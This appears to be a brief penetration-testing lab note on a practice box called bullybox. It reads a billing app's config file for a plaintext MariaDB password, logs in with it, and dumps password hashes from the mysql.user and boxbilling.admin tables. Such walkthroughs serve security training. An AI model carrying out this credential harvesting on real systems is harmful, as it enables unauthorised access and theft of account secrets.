InfoSec LAB

bullyBox_MySQL

Created: 2 min read

MySQL

Checking for DB credential after performing a manual system enumeration

yuki@bullybox:/var/www/bullybox$ cat bb-config.php | grep -v '^[#/]'
<?php
return array (
  'debug' => false,
  'salt' => 'b94ff361990c5a8a37486ffe13fabc96',
  'url' => 'http://bullybox.local/',
  'admin_area_prefix' => '/bb-admin',
  'sef_urls' => true,
  'timezone' => 'UTC',
  'locale' => 'en_US',
  'locale_date_format' => '%A, %d %B %G',
  'locale_time_format' => ' %T',
  'path_data' => '/var/www/bullybox/bb-data',
  'path_logs' => '/var/www/bullybox/bb-data/log/application.log',
  'log_to_db' => true,
  'db' =>
  array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Playing-Unstylish7-Provided',
  ),
  'twig' =>
  array (
    'debug' => true,
    'auto_reload' => true,
    'cache' => '/var/www/bullybox/bb-data/cache',
  ),
  'api' =>
  array (
    'require_referrer_header' => false,
    'allowed_ips' =>
    array (
    ),
    'rate_span' => 3600,
    'rate_limit' => 1000,
  ),
);

The DB credential is the same; admin:Playing-Unstylish7-Provided

yuki@bullybox:/var/www/bullybox$ mysql -uadmin -pPlaying-Unstylish7-Provided
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 130989
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

Session established

mysql DB

MariaDB [(none)]> SELSELECT User,Password FROM mysql.user;
SELECT User,Password FROM mysql.user;
+-------------+-------------------------------------------+
| User        | Password                                  |
+-------------+-------------------------------------------+
| mariadb.sys |                                           |
| root        | invalid                                   |
| mysql       | invalid                                   |
| admin       | *409A97555E8BE08B7E88F3C5E7CABFC08EB1BFD1 |
+-------------+-------------------------------------------+
4 rows in set (0.001 sec)

Credential hashes in the mysql DB

boxbilling DB

MariaDB [(none)]> SELSELECT email,pass FROM boxbilling.admin;
SELECT email,pass FROM boxbilling.admin;
+----------------------+--------------------------------------------------------------+
| email                | pass                                                         |
+----------------------+--------------------------------------------------------------+
| admin@bullybox.local | $2y$10$Yu8nDAxFAYfeVVZTdLfOjO0UhanwrYYYK1lDTHlF6TxxMU96r/pm2 |
+----------------------+--------------------------------------------------------------+
1 row in set (0.000 sec)

Credential hashes in the boxbilling DB

Interactive Graph View

Backlinks